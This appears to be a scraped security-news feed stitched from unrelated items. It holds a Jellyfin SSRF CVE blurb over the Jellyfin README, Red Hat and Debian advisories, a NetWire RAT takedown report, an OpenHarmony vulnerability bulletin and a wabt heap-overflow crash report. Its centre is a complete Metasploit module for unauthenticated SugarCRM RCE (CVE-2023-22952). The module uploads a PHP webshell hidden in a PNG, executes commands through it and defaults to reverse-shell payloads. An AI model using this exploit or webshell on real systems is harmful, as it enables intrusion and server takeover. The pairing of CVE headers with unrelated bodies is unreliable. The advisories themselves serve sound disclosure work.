Jellyfin up to v10.7.7 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /Repositories. This vulnerability allows attackers to access network resources and sensitive information via a crafted POST request.

**Jellyfin****The Free Software Media System**

Jellyfin is a Free Software Media System that puts you in control of managing and streaming your media. It is an alternative to the proprietary Emby and Plex, to provide media from a dedicated server to end-user devices via multiple apps. Jellyfin is descended from Emby's 3.5.2 release and ported to the .NET Core framework to enable full cross-platform support. There are no strings attached, no premium licenses or features, and no hidden agendas: just a team who want to build something better and work together to achieve it. We welcome anyone who is interested in joining us in our quest!

For further details, please see our documentation page. To receive the latest updates, get help with Jellyfin, and join the community, please visit one of our communication channels. For more information about the project, please see our about page.

**Want to get started?**  
Check out our downloads page or our installation guide, then see our quick start guide. You can also build from source.  

**Something not working right?**  
Open an Issue on GitHub.  

**Want to contribute?**  
Check out our contributing choose-your-own-adventure to see where you can help, then see our contributing guide and our community standards.  

**New idea or improvement?**  
Check out our feature request hub.  

**Don't see Jellyfin in your language?**  
Check out our Weblate instance to help translate Jellyfin and its subprojects.  

**Jellyfin Server**

This repository contains the code for Jellyfin's backend server. Note that this is only one of many projects under the Jellyfin GitHub organization on GitHub. If you want to contribute, you can start by checking out our documentation to see what to work on.

**Server Development**

These instructions will help you get set up with a local development environment in order to contribute to this repository. Before you start, please be sure to completely read our guidelines on development contributions. Note that this project is supported on all major operating systems except FreeBSD, which is still incompatible.

**Prerequisites**

Before the project can be built, you must first install the .NET 7.0 SDK on your system.

Instructions to run this project from the command line are included here, but you will also need to install an IDE if you want to debug the server while it is running. Any IDE that supports .NET 6 development will work, but two options are recent versions of Visual Studio (at least 2022) and Visual Studio Code.

ffmpeg will also need to be installed.

**Cloning the Repository**

After dependencies are installed you will need to clone a local copy of this repository. If you just want to run the server from source you can clone this repository directly, but if you are intending to contribute code changes to the project, you should set up your own fork of the repository. The following example shows how you can clone the repository directly over HTTPS.

git clone https://github.com/jellyfin/jellyfin.git

**Installing the Web Client**

The server is configured to host the static files required for the web client in addition to serving the backend by default. Before you can run the server, you will need to get a copy of the web client since they are not included in this repository directly.

Note that it is also possible to host the web client separately from the web server with some additional configuration, in which case you can skip this step.

There are three options to get the files for the web client.

1.  Download one of the finished builds from the Azure DevOps pipeline. You can download the build for a specific release by looking at the branches tab of the pipelines page.
2.  Build them from source following the instructions on the jellyfin-web repository
3.  Get the pre-built files from an existing installation of the server. For example, with a Windows server installation the client files are located at C:\Program Files\Jellyfin\Server\jellyfin-web

**Running The Server**

The following instructions will help you get the project up and running via the command line, or your preferred IDE.

**Running With Visual Studio**

To run the project with Visual Studio you can open the Solution (.sln) file and then press F5 to run the server.

**Running With Visual Studio Code**

To run the project with Visual Studio Code you will first need to open the repository directory with Visual Studio Code using the Open Folder... option.

Second, you need to install the recommended extensions for the workspace. Note that extension recommendations are classified as either "Workspace Recommendations" or "Other Recommendations", but only the "Workspace Recommendations" are required.

After the required extensions are installed, you can run the server by pressing F5.

**Running From The Command Line**

To run the server from the command line you can use the dotnet run command. The example below shows how to do this if you have cloned the repository into a directory named jellyfin (the default directory name) and should work on all operating systems.

cd jellyfin                          # Move into the repository directory
dotnet run --project Jellyfin.Server --webdir /absolute/path/to/jellyfin-web/dist # Run the server startup project

A second option is to build the project and then run the resulting executable file directly. When running the executable directly you can easily add command line options. Add the --help flag to list details on all the supported command line options.

1.  Build the project

dotnet build                       # Build the project
cd Jellyfin.Server/bin/Debug/net7.0 # Change into the build output directory

2.  Execute the build output. On Linux, Mac, etc. use ./jellyfin and on Windows use jellyfin.exe.

**Running The Tests**

This repository also includes unit tests that are used to validate functionality as part of a CI pipeline on Azure. There are several ways to run these tests.

1.  Run tests from the command line using dotnet test
2.  Run tests in Visual Studio using the Test Explorer
3.  Run individual tests in Visual Studio Code using the associated CodeLens annotation

**Advanced Configuration**

The following sections describe some more advanced scenarios for running the server from source that build upon the standard instructions above.

**Hosting The Web Client Separately**

It is not necessary to host the frontend web client as part of the backend server. Hosting these two components separately may be useful for frontend developers who would prefer to host the client in a separate webpack development server for a tighter development loop. See the jellyfin-web repo for instructions on how to do this.

To instruct the server not to host the web content, there is a nowebclient configuration flag that must be set. This can specified using the command line switch --nowebclient or the environment variable JELLYFIN_NOWEBCONTENT=true.

Since this is a common scenario, there is also a separate launch profile defined for Visual Studio called Jellyfin.Server (nowebcontent) that can be selected from the 'Start Debugging' dropdown in the main toolbar.

**NOTE:** The setup wizard can not be run if the web client is hosted separately.

This project is supported by:

CVE-2023-27161: GitHub - jellyfin/jellyfin: The Free Software Media System

This Metasploit module exploits CVE-2023-22952, a remote code execution vulnerability in SugarCRM 11.0 Enterprise, Professional, Sell, Serve, and Ultimate versions prior to 11.0.5 and SugarCRM 12.0 Enterprise, Sell, and Serve versions prior to 12.0.2.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'securerandom'class MetasploitModule < Msf::Exploit::Remote  Rank = GoodRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  include Msf::Exploit::FileDropper  include Msf::Exploit::Format::PhpPayloadPng  def initialize(info = {})    super(      update_info(        info,        'Name' => 'SugarCRM unauthenticated Remote Code Execution (RCE)',        'Description' => %q{          This module exploits CVE-2023-22952, a Remote Code Execution (RCE) vulnerability in SugarCRM 11.0 Enterprise,          Professional, Sell, Serve, and Ultimate versions prior to 11.0.5 and SugarCRM 12.0 Enterprise, Sell, and          Serve versions prior to 12.0.2.          The vulnerability occurs due to a lack of appropriate validation when uploading a malicious PNG file with          embedded PHP code to the /cache/images/ directory on the web server using the vulnerable endpoint          /index.php?module=EmailTemplates&action=AttachFiles. Once uploaded to the server, depending on server configuration,          the attacker can access the malicious PNG file via HTTP or HTTPS, thereby executing the malicious PHP code and          gaining access to the system.          This vulnerability does not require authentication because there is a missing authentication check in the          loadUser() method in include/MVC/SugarApplication.php. After a failed login, the session does not get          destroyed and hence the attacker can continue to send valid requests to the application.          Because of this, any remote attacker, regardless of authentication, can exploit this vulnerability to gain          access to the underlying operating system as the user that the web services are running as (typically www-data).        },        'Author' => [          'Sw33t.0day', # discovery          'h00die-gr3y <h00die.gr3y[at]gmail.com>' # Metasploit module        ],        'References' => [          [ 'CVE', '2023-22952' ],          [ 'URL', 'https://seclists.org/fulldisclosure/2022/Dec/31' ],          [ 'URL', 'https://support.sugarcrm.com/Resources/Security/sugarcrm-sa-2023-001/' ],          [ 'URL', 'https://sugarclub.sugarcrm.com/engage/b/sugar-news/posts/jan-5-2023-security-vulnerability-update' ],          [ 'URL', 'https://attackerkb.com/topics/E486ui94II/cve-2023-22952' ],          [ 'PACKETSTORM', '170346' ]        ],        'License' => MSF_LICENSE,        'Platform' => [ 'unix', 'linux', 'php' ],        'Privileged' => false,        'Arch' => [ ARCH_CMD, ARCH_PHP, ARCH_X64, ARCH_X86 ],        'Targets' => [          [            'PHP',            {              'Platform' => 'php',              'Arch' => ARCH_PHP,              'Type' => :php,              'DefaultOptions' => {                'PAYLOAD' => 'php/meterpreter/reverse_tcp'              }            }          ],          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_bash'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ ARCH_X64, ARCH_X86 ],              'Type' => :linux_dropper,              'CmdStagerFlavor' => [ 'wget', 'curl', 'printf', 'bourne' ],              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2022-12-28',        'DefaultOptions' => {          'SSL' => false,          'RPORT' => 80        },        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],          'Reliability' => [ REPEATABLE_SESSION ]        }      )    )    register_options(      [        OptString.new('TARGETURI', [ true, 'SugarCRM base url', '/' ]),        OptString.new('WEBSHELL', [          false, 'The name of the webshell with extension to trick the parser like .phtml, .phar, etc. Webshell name will be randomly generated if left unset.', ''        ]),        OptEnum.new('COMMAND', [ true, 'Use PHP command function', 'passthru', [ 'passthru', 'shell_exec', 'system', 'exec' ]], conditions: %w[TARGET != 0])      ]    )  end  def authenticate    # generate PHP session-id    @phpsessid = "PHPSESSID=#{SecureRandom.uuid}"    # randomize user and password to obfuscate and make finger printing difficult.    user_name = Rex::Text.rand_name    user_password = Rex::Text.rand_text_alphanumeric(8..16)    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(datastore['TARGETURI'], 'index.php'),      'cookie' => @phpsessid.to_s,      'ctype' => 'application/x-www-form-urlencoded',      'vars_post' => {        'module' => 'Users',        'action' => 'Authenticate',        'user_name' => user_name.to_s,        'user_password' => user_password.to_s      }    })    if res && res.code == 500 && !res.body.blank?      return true    else      return false    end  end  def upload_webshell    # randomize file name and extension if option WEBSHELL is not set    file_ext = ['phar', 'phtml']    if datastore['WEBSHELL'].blank?      @webshell_name = "#{Rex::Text.rand_text_alpha(8..16)}.#{file_ext.sample}"    else      @webshell_name = datastore['WEBSHELL'].to_s    end    # select webshell depending on the target setting (PHP or others).    @post_param = Rex::Text.rand_text_alphanumeric(1..8)    @get_param = Rex::Text.rand_text_alphanumeric(1..8)    if target['Type'] == :php      payload = "<?php @eval(base64_decode($_POST[\'#{@post_param}\']));?>"    else      payload = "<?=$_GET[\'#{@get_param}\'](base64_decode($_POST[\'#{@post_param}\']));?>"    end    # inject PHP payload into the PLTE chunk of the PNG image    png_webshell = inject_php_payload_png(payload, injection_method: 'PLTE')    if png_webshell.nil?      return false    end    # construct multipart form data    form_data = Rex::MIME::Message.new    form_data.add_part('AttachFiles', nil, nil, 'form-data; name="action"')    form_data.add_part('EmailTemplates', nil, nil, 'form-data; name="module"')    form_data.add_part(png_webshell.to_s, 'image/png', 'binary', "form-data; name=\"file\"; filename=\"#{@webshell_name}\"")    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(datastore['TARGETURI'], 'index.php'),      'cookie' => @phpsessid.to_s,      'ctype' => "multipart/form-data; boundary=#{form_data.bound}",      'data' => form_data.to_s    })    if res && res.code == 200 && !res.body.blank?      # parse HTML to find the webshell name embedded in a table that indicates a successful upload      html = res.get_html_document      if html.at("td[contains(\"#{@webshell_name}\")]")        return true      else        return false      end    else      return false    end  end  def execute_php(cmd, _opts = {})    payload = Base64.strict_encode64(cmd)    return send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(datastore['TARGETURI'], 'cache', 'images', @webshell_name),      'cookie' => @phpsessid.to_s,      'ctype' => 'application/x-www-form-urlencoded',      'vars_post' => {        @post_param => payload      }    })  end  def execute_command(cmd, _opts = {})    payload = Base64.strict_encode64(cmd)    php_cmd_function = datastore['COMMAND']    return send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(datastore['TARGETURI'], 'cache', 'images', @webshell_name),      'cookie' => @phpsessid.to_s,      'ctype' => 'application/x-www-form-urlencoded',      'vars_get' => {        @get_param => php_cmd_function      },      'vars_post' => {        @post_param => payload      }    })  end  def exploit    fail_with(Failure::NoAccess, 'Authentication bypass failed.') unless authenticate    fail_with(Failure::NotVulnerable, "Webshell #{@webshell_name} upload failed, the system is likely patched.") unless upload_webshell    register_file_for_cleanup(@webshell_name.to_s)    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :php      execute_php(payload.encoded)    when :unix_cmd      execute_command(payload.encoded)    when :linux_dropper      execute_cmdstager(linemax: 65536)    end  endend

SugarCRM 12.x Remote Code Execution / Shell Upload

Red Hat Security Advisory 2023-1179-01 - Red Hat OpenShift Serverless Client kn 1.27.1 provides a CLI to interact with Red Hat OpenShift Serverless 1.27.1. The kn CLI is delivered as an RPM package for installation on RHEL platforms, and as binaries for non-Linux platforms. This release includes security and bug fixes, and enhancements.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: Release of OpenShift Serverless Client kn 1.27.1  
Advisory ID:       RHSA-2023:1179-01  
Product:           RHOSS  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1179  
Issue date:        2023-03-09  
CVE Names:         CVE-2022-41717  
====================================================================  
1. Summary:

Release of OpenShift Serverless 1.27.1  
The References section contains CVE links providing detailed severity  
ratings  
for each vulnerability. Ratings are based on a Common Vulnerability Scoring  
System (CVSS) base score.

2. Relevant releases/architectures:

Openshift Serverless 1 on RHEL 8Base - ppc64le, s390x, x86_64

3. Description:

Red Hat OpenShift Serverless Client kn 1.27.1 provides a CLI to interact  
with Red Hat OpenShift Serverless 1.27.1. The kn CLI is delivered as an RPM  
package for installation on RHEL platforms, and as binaries for non-Linux  
platforms.

This release includes security and bug fixes, and enhancements.

Security Fixes in this release include:

- - golang: net/http: An attacker can cause excessive memory growth in a Go  
server accepting HTTP/2 requests(CVE-2022-41717)

For more details about the security issues, including the impact; a CVSS  
score; acknowledgments; and other related information refer to the CVE  
pages linked in the References section.

4. Solution:

See the Red Hat OpenShift Container Platform 4.8 documentation at:  
https://access.redhat.com/documentation/en-us/openshift_container_platform/4.8/html/serverless/index  
See the Red Hat OpenShift Container Platform 4.9 documentation at:  
https://access.redhat.com/documentation/en-us/openshift_container_platform/4.9/html/serverless/index  
See the Red Hat OpenShift Container Platform 4.10 documentation at:  
https://access.redhat.com/documentation/en-us/openshift_container_platform/4.10/html/serverless/index  
See the Red Hat OpenShift Container Platform 4.11 documentation at:  
https://access.redhat.com/documentation/en-us/openshift_container_platform/4.11/html/serverless/index  
See the Red Hat OpenShift Container Platform 4.12 documentation at:  
https://access.redhat.com/documentation/en-us/openshift_container_platform/4.12/html/serverless/index

5. Bugs fixed (https://bugzilla.redhat.com/):

2161274 - CVE-2022-41717 golang: net/http: An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests

6. Package List:

Openshift Serverless 1 on RHEL 8Base:

Source:  
openshift-serverless-clients-1.6.1-2.el8.src.rpm

ppc64le:  
openshift-serverless-clients-1.6.1-2.el8.ppc64le.rpm

s390x:  
openshift-serverless-clients-1.6.1-2.el8.s390x.rpm

x86_64:  
openshift-serverless-clients-1.6.1-2.el8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-41717  
https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/documentation/en-us/openshift_container_platform/4.9/html/serverless/index  
https://access.redhat.com/documentation/en-us/openshift_container_platform/4.10/html/serverless/index  
https://access.redhat.com/documentation/en-us/openshift_container_platform/4.11/html/serverless/index  
https://access.redhat.com/documentation/en-us/openshift_container_platform/4.12/html/serverless/index

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZApNXtzjgjWX9erEAQiPzw/9Gbco/43S6fsbOzj07PB/sHGgN3bIGSP4  
RH0CtriGf38oXVLNVxC7x+N448qZJWhBP3j3WTX3t6IHkI7IuMlV495js+bsiOxZ  
ueCzk+tJyhHLGZNoI36XxZotOMIW2UChJzRkmvLmMlQs7ZwiORdGVZwv7KxihWlC  
jvK1r059qfRitggGgLUxDnrGvcPo4oCseM0KesI6yQG6pPnk8DMwIZc2mL4fYpzS  
wJ/JnaAfpgSpLy17WB8qghvzW1dDNlr386t53n77H32j3wpMndI9uKX8leZXv2iA  
EqHyBtF5zo4y1Rc7JTO0sG9AwYoks/1BKUHqi00kjZBSj3DY9yU1aJLzeyKwpKFt  
YNzlYMF7tfzkANJ3VVCLOHgWImK9+kSSIlQG54y1swi/ttsSOOD5m2f9hA2nGFzp  
4BB++293FSKMVASmkzHOlYbOq4N/1Mw9qCQaRKiRVN6XHmz3gs6BuoqzRl95SjW+  
4J/QCo6K8s0/5Fbyx0pqkFiZ1IwlQahspZsIZU/wjYi/cZSSo5PNJqBhhqk1qdi1  
T7VB1JU6h46jswceN/9mqtah37xcLlomihwmzF4owApxDeFpnPBP7P+4atzWXBSi  
kbTWsXjCi4PsJdRPrHGcW/jZHSBUFHbQB+JbtZXgQ3hOww0xorsttwXrk+tp5Kw7  
fBdPcm6EH0M=dtaN  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1179-01

Debian Linux Security Advisory 5371-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5371-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
March 09, 2023                        https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : chromium  
CVE ID         : CVE-2023-1213 CVE-2023-1214 CVE-2023-1215 CVE-2023-1216  
                 CVE-2023-1217 CVE-2023-1218 CVE-2023-1219 CVE-2023-1220  
                 CVE-2023-1221 CVE-2023-1222 CVE-2023-1223 CVE-2023-1224  
                 CVE-2023-1225 CVE-2023-1226 CVE-2023-1227 CVE-2023-1228  
                 CVE-2023-1229 CVE-2023-1230 CVE-2023-1231 CVE-2023-1232  
                 CVE-2023-1233 CVE-2023-1234 CVE-2023-1235 CVE-2023-1236

Multiple security issues were discovered in Chromium, which could result  
in the execution of arbitrary code, denial of service or information  
disclosure.

For the stable distribution (bullseye), these problems have been fixed in  
version 111.0.5563.64-1~deb11u1.

We recommend that you upgrade your chromium packages.

For the detailed security status of chromium please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/chromium

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmQKMPAACgkQEMKTtsN8  
TjYhlg/8CfPNklE4eO+wy0otR3hUK3XNeXJqOKSUFybRmZ9223lANRVwBHHTudqh  
1Xi/PxnSDVHNH2hqVQZQwnIiTVPXedT8fgS50eoR0RfJjDSy79rL+oLNXbqb8F3/  
jY07r1McfUUIjVzg8H/jSVN0fKQG0z53RSx9eX8jITb4r4N1Wy8DQ0XzVGFTxzuR  
ao3e7kM/TW8Z/hsHSrLTJiMnqha15GGn9d8IOK5ecqEgWNIOeeDM0WQGoITuIgYq  
GqEufHOhgEDbaty6kMzYWPqeVFq/7jkTwBiMTSi6Grjwb+2KroMJPQhg5jkfslpL  
bXAom3Sr3lArp88cNR0g8p41G7MjbP1fq5STUxT056zKFGO+cySaxhn4ryMfcPFx  
dKqXSHxDSpPjLz1qFTPZovU+x0O6HIazoa4MupAhIxlLvkcdYC2/35DrCr6098HR  
X+v8psjeczukkBBzA8eIQGH07f2jWwXxSlLoNr4ClePnsk6YLvZTg0ua/snF/x5i  
NmDs2tQkhHKCkLzsu1L0uyImBuiIihBNLasNUpIinjf4iLOtSrl+vsSzOipvIwaW  
FL5LYoOPao4n+zBGjOQwUceQ9SJsB1hljk8YUfvgbotzwup5YCqRF6FwAXvlR9kh  
Eo/izaErx3FvokrfaifufKAeOrSn+AP9LsHrm2fkuCBNXqz3Z1c=gwSp  
-----END PGP SIGNATURE-----

Debian Security Advisory 5371-1

A coordinated international law enforcement exercise has taken down the online infrastructure associated with a cross-platform remote access trojan (RAT) known as NetWire.
Coinciding with the seizure of the sales website www.worldwiredlabs[.]com, a Croatian national who is suspected to be the website's administrator has been arrested. While the suspect's name was not released, investigative

Cyber Crime / Cyber Threat

A coordinated international law enforcement exercise has taken down the online infrastructure associated with a cross-platform remote access trojan (RAT) known as **NetWire**.

Coinciding with the seizure of the sales website www.worldwiredlabs\[.\]com, a Croatian national who is suspected to be the website's administrator has been arrested. While the suspect's name was not released, investigative journalist Brian Krebs identified Mario Zanko as the owner of the domain.

"NetWire is a licensed commodity RAT offered in underground forums to non-technical users to carry out their own criminal activities," Europol's European Cybercrime Center (EC3) said in a tweet.

Advertised since at least 2012, the malware is typically distributed via malspam campaigns and gives a remote attacker complete control over a Windows, macOS, or Linux system. It also comes with password-stealing and keylogging capabilities.

The U.S. Department of Justice (DoJ) said an investigation into the malware operation was launched by the Federal Bureau of Investigation (FBI) in 2020, with the agency creating an account on the site and paying for a subscription to create a custom NetWire RAT instance.

WEBINAR

Discover the Hidden Dangers of Third-Party SaaS Apps

Are you aware of the risks associated with third-party app access to your company's SaaS apps? Join our webinar to learn about the types of permissions being granted and how to minimize risk.

RESERVE YOUR SEAT

NetWire, over the past year, has been used by multiple threat actors, including TA2541 and OPERA1ER, to break into targets of interest and harvest sensitive information. According to Avast, it also emerged as one of the most prevalent RATs during Q4 2022.

"By removing the Netwire RAT, the FBI has impacted the criminal cyber ecosystem," Donald Alway, the assistant director in charge of the FBI's Los Angeles field office, said in a statement.

"The global partnership that led to the arrest in Croatia also removed a popular tool used to hijack computers in order to perpetuate global fraud, data breaches and network intrusions by threat groups and cyber criminals."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

International Law Enforcement Takes Down Infamous NetWire Cross-Platform RAT

The kernel subsystem function check_permission_for_set_tokenid within OpenHarmony-v3.1.5 and prior versions has an UAF vulnerability which local attackers can exploit this vulnerability to escalate the privilege to root.

**Security Vulnerabilities in Feburary 2023**

_published Feburary 3,2023_  
_updated Feburary 3,2023_

Vulnerability ID

related Vulnerability

Vulnerability Description

Vulnerability Impact

CVSS3.1 Base Score

affected versions

affected projects

fix link

reference

OpenHarmony-SA-2023-0201

CVE-2023-0083

The ArkUI framework subsystem doesn't check the input parameter,causing type confusion and invalid memory access.

Local attackers can exploit this vulnerability to send malicious data, causing the current application to crash.

4.0

OpenHarmony-v3.1-Release through OpenHarmony-v3.1.5-Release  
OpenHarmony-v3.0-LTS through OpenHarmony-v3.0.7-LTS

arkui\_ace\_engine

3.1.x  
3.0.x

Reported by researchers

OpenHarmony-SA-2023-0202

CVE-2023-22301

The kernel subsystem hmdfs has a arbitrary memory accessing vulnerability.

Network attackers can launch a remote attack to obtain kernel memory data of the target system.

6.5

OpenHarmony-v3.1-Release through OpenHarmony-v3.1.5-Release

kernel\_linux\_5.10

3.1.x

Reported by researchers

OpenHarmony-SA-2023-0203

CVE-2023-22436

The kernel subsystem function check\_permission\_for\_set\_tokenid has an UAF vulnerability.

Local attackers can exploit this vulnerability to escalate the privilege to root.

7.8

OpenHarmony-v3.1-Release through OpenHarmony-v3.1.5-Release

kernel\_linux\_5.10

3.1.x

Reported by researchers

**The following table lists the third-party library vulnerabilities with only the CVE, severity, and affected OpenHarmony versions provided. For more details, see the security bulletins released by third-parties.**

CVE

severity

affected OpenHarmony versions

fix link

CVE-2022-2347

High

OpenHarmony-v3.1-Release through OpenHarmony-v3.1.4-Release  
OpenHarmony-v3.0-LTS through OpenHarmony-v3.0.7-LTS

3.1.x  
3.0.x

CVE-2022-4135

Critical

OpenHarmony-v3.1-Release through OpenHarmony-v3.1.5-Release

3.1.x

CVE-2022-4186

Medium

OpenHarmony-v3.1-Release through OpenHarmony-v3.1.5-Release

3.1.x

CVE-2022-4438

High

OpenHarmony-v3.1-Release through OpenHarmony-v3.1.5-Release

3.1.x

CVE-2022-4437

High

OpenHarmony-v3.1-Release through OpenHarmony-v3.1.5-Release

3.1.x

CVE-2022-4436

High

OpenHarmony-v3.1-Release through OpenHarmony-v3.1.5-Release

3.1.x

CVE-2022-41218

Medium

OpenHarmony-v3.1-Release through OpenHarmony-v3.1.4-Release  
OpenHarmony-v3.0-LTS through OpenHarmony-v3.0.7-LTS

3.1.x  
3.0.x

CVE-2022-3424

High

OpenHarmony-v3.1-Release through OpenHarmony-v3.1.5-Release  
OpenHarmony-v3.0-LTS through OpenHarmony-v3.0.7-LTS

3.1.x  
3.0.x

CVE-2022-4129

Medium

OpenHarmony-v3.1-Release through OpenHarmony-v3.1.4-Release  
OpenHarmony-v3.0-LTS through OpenHarmony-v3.0.7-LTS

3.1.x  
3.0.x

CVE-2022-42328

Medium

OpenHarmony-v3.1-Release through OpenHarmony-v3.1.5-Release  
OpenHarmony-v3.0-LTS through OpenHarmony-v3.0.7-LTS

3.1.x  
3.0.x

CVE-2022-3643

Critical

OpenHarmony-v3.1-Release through OpenHarmony-v3.1.5-Release  
OpenHarmony-v3.0-LTS through OpenHarmony-v3.0.7-LTS

3.1.x  
3.0.x

CVE-2022-3105

Medium

OpenHarmony-v3.1-Release through OpenHarmony-v3.1.4-Release  
OpenHarmony-v3.0-LTS through OpenHarmony-v3.0.7-LTS

3.1.x  
3.0.x

CVE-2022-3104

Medium

OpenHarmony-v3.1-Release through OpenHarmony-v3.1.4-Release  
OpenHarmony-v3.0-LTS through OpenHarmony-v3.0.7-LTS

3.1.x  
3.0.x

CVE-2022-3115

Medium

OpenHarmony-v3.1-Release through OpenHarmony-v3.1.4-Release  
OpenHarmony-v3.0-LTS through OpenHarmony-v3.0.7-LTS

3.1.x  
3.0.x

CVE-2022-3113

Medium

OpenHarmony-v3.1-Release through OpenHarmony-v3.1.4-Release  
OpenHarmony-v3.0-LTS through OpenHarmony-v3.0.7-LTS

3.1.x  
3.0.x

CVE-2022-3112

Medium

OpenHarmony-v3.1-Release through OpenHarmony-v3.1.4-Release  
OpenHarmony-v3.0-LTS through OpenHarmony-v3.0.7-LTS

3.1.x  
3.0.x

CVE-2022-3111

Medium

OpenHarmony-v3.1-Release through OpenHarmony-v3.1.4-Release  
OpenHarmony-v3.0-LTS through OpenHarmony-v3.0.7-LTS

3.1.x  
3.0.x

CVE-2022-3108

Medium

OpenHarmony-v3.1-Release through OpenHarmony-v3.1.4-Release  
OpenHarmony-v3.0-LTS through OpenHarmony-v3.0.7-LTS

3.1.x  
3.0.x

CVE-2022-3107

Medium

OpenHarmony-v3.1-Release through OpenHarmony-v3.1.4-Release  
OpenHarmony-v3.0-LTS through OpenHarmony-v3.0.7-LTS

3.1.x  
3.0.x

CVE-2022-3106

Medium

OpenHarmony-v3.1-Release through OpenHarmony-v3.1.4-Release  
OpenHarmony-v3.0-LTS through OpenHarmony-v3.0.7-LTS

3.1.x  
3.0.x

CVE-2022-47519

Medium

OpenHarmony-v3.1-Release through OpenHarmony-v3.1.4-Release  
OpenHarmony-v3.0-LTS through OpenHarmony-v3.0.7-LTS

3.1.x  
3.0.x

CVE-2022-43551

Medium

OpenHarmony-v3.1-Release through OpenHarmony-v3.1.5-Release  
OpenHarmony-v3.0-LTS through OpenHarmony-v3.0.7-LTS  
OpenHarmony-v1.1.0-Release through OpenHarmony-v1.1.5-LTS

3.1.x  
3.0.x  
1.1.x

CVE-2022-43552

Medium

OpenHarmony-v3.1-Release through OpenHarmony-v3.1.5-Release  
OpenHarmony-v3.0-LTS through OpenHarmony-v3.0.7-LTS  
OpenHarmony-v1.1.0-Release through OpenHarmony-v1.1.5-LTS

3.1.x  
3.0.x  
1.1.x

CVE-2022-47518

Medium

OpenHarmony-v3.1-Release through OpenHarmony-v3.1.4-Release  
OpenHarmony-v3.0-LTS through OpenHarmony-v3.0.7-LTS

3.1.x  
3.0.x

CVE-2022-47520

Low

OpenHarmony-v3.1-Release through OpenHarmony-v3.1.4-Release  
OpenHarmony-v3.0-LTS through OpenHarmony-v3.0.7-LTS

3.1.x  
3.0.x

CVE-2022-47521

Medium

OpenHarmony-v3.1-Release through OpenHarmony-v3.1.4-Release  
OpenHarmony-v3.0-LTS through OpenHarmony-v3.0.7-LTS

3.1.x  
3.0.x

CVE-2022-3109

High

OpenHarmony-v3.1-Release through OpenHarmony-v3.1.5-Release  
OpenHarmony-v3.0-LTS through OpenHarmony-v3.0.7-LTS  
OpenHarmony-v1.1.0-Release through OpenHarmony-v1.1.5-LTS

3.1.x  
3.0.x  
1.1.x

CVE-2022-4662

Medium

OpenHarmony-v3.1-Release through OpenHarmony-v3.1.5-Release  
OpenHarmony-v3.0-LTS through OpenHarmony-v3.0.7-LTS

3.1.x  
3.0.x

CVE-2022-3890

Critical

OpenHarmony-v3.1-Release through OpenHarmony-v3.1.5-Release

3.1.x

CVE-2022-20568

High

OpenHarmony-v3.1-Release through OpenHarmony-v3.1.5-Release  
OpenHarmony-v3.0-LTS through OpenHarmony-v3.0.7-LTS

3.1.x  
3.0.x

CVE-2023-22436: en/security-disclosure/2023/2023-02.md · OpenHarmony/security - Gitee.com

WebAssembly v1.0.29 was discovered to contain a heap overflow via the component component wabt::Node::operator.

**Environment**

    OS      : Linux ubuntu 5.15.0-46-generic #49~20.04.1-Ubuntu SMP Thu Aug 4 19:15:44 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
    Commit  : 3054d61f703d609995798f872fc86b462617c294
    Version : 1.0.29
    Build   : make clang-debug-asan
    

**Proof of concept**

poc-2.wasm.zip

**Stack dump**

    =================================================================
    ==1704949==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x610000000010 at pc 0x0000005f2828 bp 0x7ffc769a3c60 sp 0x7ffc769a3c58
    READ of size 4 at 0x610000000010 thread T0
        #0 0x5f2827 in wabt::Node::operator=(wabt::Node&&) /wabt/out/clang/Debug/asan/../../../../src/decompiler-ast.h:67:17
        #1 0x5dc955 in wabt::Node::Node(wabt::Node&&) /wabt/out/clang/Debug/asan/../../../../src/decompiler-ast.h:65:28
